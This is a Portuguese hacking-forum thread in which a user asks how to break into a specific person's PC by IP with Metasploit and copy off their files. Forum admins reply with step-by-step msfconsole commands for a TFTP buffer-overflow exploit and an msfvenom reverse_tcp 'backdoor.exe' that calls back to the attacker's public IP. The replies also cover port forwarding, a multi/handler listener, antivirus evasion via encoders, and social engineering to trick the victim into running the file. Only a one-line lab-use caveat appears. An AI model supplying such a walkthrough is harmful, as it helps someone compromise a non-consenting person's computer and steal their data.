Como eu me conecto no PC de alguém pelo Metaploist?
Eu quero saber os comandos, eu preciso me conectar no PC da pessoa pelo Metaploist, me mande os comandos para eu fazer isso?
Aí me ensinem também como eu transfiro os dados do PC dele pro meu Computador.
*Comandos
*Passo-a-passo
*Instruções
*Transferencia de Arquivo
*Como usar um Backdoor
*Como enviar a ele
*Como hackear pelo IP
201.10.242.116
Esse é o IP dele, preciso me conectar, mas não sei como, Microsoft não conseguiu resolver p/mim
Conexão Remota e Metaploist
- Kodo no Kami
- Admin
- Posts: 732
- Joined: Fri Jan 02, 2015 1:56 pm
- Contact:
Re: Conexão Remota e Metaploist
depende muito mano, estabelecer a conexao isso é feito automaticamente atraves do proprio payload escolhido (isso quando o exploit funciona é claro). alguns payloads permite fazer a conexao direta ou seja a sua maquina fazendo a conexao com a da vitima (esses payloads costuma ter o nome bind ex: bind_tcp), outros permite a vitima fazer conexao na maquina do invasor no caso a conexao reversa (normalmente esses payloads tem o nome reverse ex: reverse_tcp), sem dizer que existem N tipo de payloads para diversos tipos de fins, alguns retorna uma shell do sistema invadido como meterprete, outros permite acesso grafico com vnc, alguns permite injeção no alvo, outros comunicação criptografada, alguns funciona em plataformas especificas como windows x64, linux, android e servidores web. depende muito de cada payload e o seu proposito. so lembrando payload é um pequeno codigo que é injetado depois que a maquina é invadido a invasão em si depende da exploração pelo exploit. invasão por exploit depende do serviço rodando que esteja vulneravel (isso depende da versao do programa, do sistema onde esta rodando e etc), outra forma seria usar o payload em um executavel no caso um trojan (que nao e nada mais nada menos que um programa que vai executar o payload), para abrir o metasploit basta abrir o msfconsole
com o metasploit aberto voce pode listar todos os exploits com o comando show exploits
como exemplo tem o exploit windows/tftp/dlink_long_filename ou seja esse é um exploit para windows que tenha um servidor tftp dlink (D-Link TFTP 1.0) que sera explorado por um Long Filename Buffer Overflow, ou seja para conseguir explorar por essa vulnerabilidade precisa ter um servidor D-Link TFTP com a versao exata 1.0 rodando na vitima, supondo que a vitima tenha um servidor desse rodando para usar esse exploit deve usar o comando "use" seguido dele
depois disso tem que setar as configurações correta para isso se usa show options, para exibir as opções que deve setar algumas sao obrigatorias, tambem no exploit target é mostrado qual a versao do sistema que deve ser explorada (no exemplo é um Windows 2000 SP4 English)
para setar a opção deve usar o comando set seguido da opção seguido do valor nela (no exemplo so temos o RHOST e o RPORT sendo que o RPORT ja tem um valor padrao)
depois disso deve especificar o payload para isso pode listar todos os payloads com o comando show payloads
para setar o payload set payload seguido do escolhido
com show options para ver se tem alguma opção nova nele
por fim seria apenas usar o comando exploit para explorar caso a vitima tivesse aquele serviço vuln rodando, no caso se tudo desse certo ia retornar a shell do sistema ou do meterpreter (eu caso nao funcionou pq nao tenho nenhum serviço desse rodando na maquina alvo)
basicamente é assim que o metasploit funciona, so que ele tambem nao se limita apenas a isso, voce pode por exemplo usar post que sao codigo pos-exploração, pode customizar exploits, payloads, usar encoders para deixar indetectavel pelo antivirus e etc. para gerar payload no caso trojan deve usar o programa msfvenom passar os argumento como o payload escolhdo e a arquitetura depois abrir o msfconsole e abrir o exploit/multi/handle configurar o mesmo payload nele para ficar esperando conexao, depois enviar para vitima (para isso deve usar engenharia social, sei la upa fala que é um hack de jogo), quando ela executar vai retornar a shell do sistema alvo no msfconsole, depois eu faço um tutorial melhor do que esse, explicando um pouco mais sobre ele kkkk
* no caso a invasão por IP não existe, o ip é um protocolo de endereçamento no caso a invasão ocorre na camada de aplicação na maior parte das vezes de acordo com pilha tcp/ip ou osi, ou seja apenas pelo IP nao da para invadir nada apenas se tiver um serviço rodando em tal porta
Code: Select all
kodonokami@debian:~$ sudo msfconsole
Code: Select all
msf > show exploits
Code: Select all
msf > use windows/tftp/dlink_long_filename
Code: Select all
msf exploit(dlink_long_filename) > show options
Module options (exploit/windows/tftp/dlink_long_filename):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 69 yes The target port
Exploit target:
Id Name
-- ----
0 Windows 2000 SP4 English
msf exploit(dlink_long_filename) >
Code: Select all
msf exploit(dlink_long_filename) > set RHOST 192.168.1.2
RHOST => 192.168.1.2
msf exploit(dlink_long_filename) >
Code: Select all
msf exploit(dlink_long_filename) > show payloads
Code: Select all
msf exploit(dlink_long_filename) > set payload windows/meterpreter/bind_tcp
Code: Select all
msf exploit(dlink_long_filename) > show options
Module options (exploit/windows/tftp/dlink_long_filename):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.1.2 yes The target address
RPORT 69 yes The target port
Payload options (windows/meterpreter/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LPORT 4444 yes The listen port
RHOST 192.168.1.2 no The target address
Exploit target:
Id Name
-- ----
0 Windows 2000 SP4 English
msf exploit(dlink_long_filename) >
Code: Select all
msf exploit(dlink_long_filename) > exploit
[*] Started bind handler
[*] Trying target Windows 2000 SP4 English...
[*] Exploit completed, but no session was created.
msf exploit(dlink_long_filename) >
* no caso a invasão por IP não existe, o ip é um protocolo de endereçamento no caso a invasão ocorre na camada de aplicação na maior parte das vezes de acordo com pilha tcp/ip ou osi, ou seja apenas pelo IP nao da para invadir nada apenas se tiver um serviço rodando em tal porta

que desagradavel ~ mirai kuriyama
- 51M0N
- Admin
- Posts: 876
- Joined: Fri Jan 02, 2015 2:06 pm
Re: Conexão Remota e Metaploist
Olá Penguin23, complementando o que o kodo disse, se esta fora da rede pensei em algumas formas vou falar da mais fácil(existe muitas outras..ehehehe), embora muitas das vezes firewall,antivírus e etc pode dar block,mas enfim. Veja o desenho abaixo para compreender:

nesse caso tu pode abrir a porta do seu roteador ou usar um vps(essa parte podemos mostrar caso não consiga com que foi mostrado no post), vai precisar do endereço publico na hora de setar o payload, e algumas informações que precisa saber de antemão como seu ip local,público e do roteador.
ip local comando ifconfig você consegue essa informação
ip público entre no site (http://meuip.net.br) para encaminhar corretamente
ip roteador com comando router -n na coluna de gateway que contem flag “UG” será o IP do seu roteador.
Vamos criar o payload
Podemos fazer com o msfvenom, ele e uma combinação de msfpayload e msfencode, pode usar alguns desses comandos[1], mas irei usar esse.
Você terá que fazer o port forwarding no roteador(varia em cada roteador) bem tranquilo, add seu IP:PORTA local da sua maquina atacante, exemplo de configuração do roteador(deve ter algo assim..kk)
Salve e pronto essa parte esta resolvida.
Agora vamos escutar, para isso vamos iniciar o msfconsole e digite o seguintes comandos
Assim que sua vítima executar o vírus "backdoor.exe", você receberá uma sessão ai é só utilizar os comandos do meterpreter segue um post que explico algumas funcionalidades que ira te ajudar.
Uma boa leitura inicial dos seguintes livros, vai te ajudar tbm:
➢ Testes de Invasão Uma introdução prática ao hacking de Georgia Weidman
➢ The Penetration Tester's Guide by David Kennedy, Jim O'Gorman, Devon Kearns ...
➢ Nmap Essentials by David Shaw
** recomendo você fazer isso em labs controlado como vms, por motivos éticos para não prejudicar a pessoa para não vir dar problema para você também em um futuro.
inté
Referências
[1] https://www.offensive-security.com/meta ... /msfvenom/

nesse caso tu pode abrir a porta do seu roteador ou usar um vps(essa parte podemos mostrar caso não consiga com que foi mostrado no post), vai precisar do endereço publico na hora de setar o payload, e algumas informações que precisa saber de antemão como seu ip local,público e do roteador.
ip local comando ifconfig você consegue essa informação
ip público entre no site (http://meuip.net.br) para encaminhar corretamente
ip roteador com comando router -n na coluna de gateway que contem flag “UG” será o IP do seu roteador.
Vamos criar o payload
Podemos fazer com o msfvenom, ele e uma combinação de msfpayload e msfencode, pode usar alguns desses comandos[1], mas irei usar esse.
Code: Select all
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp -e generic/none -f exe LHOST= IP PUBLICO LPORT=444 > /root/backdoor.exe
Code: Select all
service type:tcp/udp
service ip address: seu ip local
start port: 444
end port: 444
Agora vamos escutar, para isso vamos iniciar o msfconsole e digite o seguintes comandos
Code: Select all
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST IP LOCAL
set LPORT 444
exploit
Uma boa leitura inicial dos seguintes livros, vai te ajudar tbm:
➢ Testes de Invasão Uma introdução prática ao hacking de Georgia Weidman
➢ The Penetration Tester's Guide by David Kennedy, Jim O'Gorman, Devon Kearns ...
➢ Nmap Essentials by David Shaw
** recomendo você fazer isso em labs controlado como vms, por motivos éticos para não prejudicar a pessoa para não vir dar problema para você também em um futuro.
inté
Referências
[1] https://www.offensive-security.com/meta ... /msfvenom/
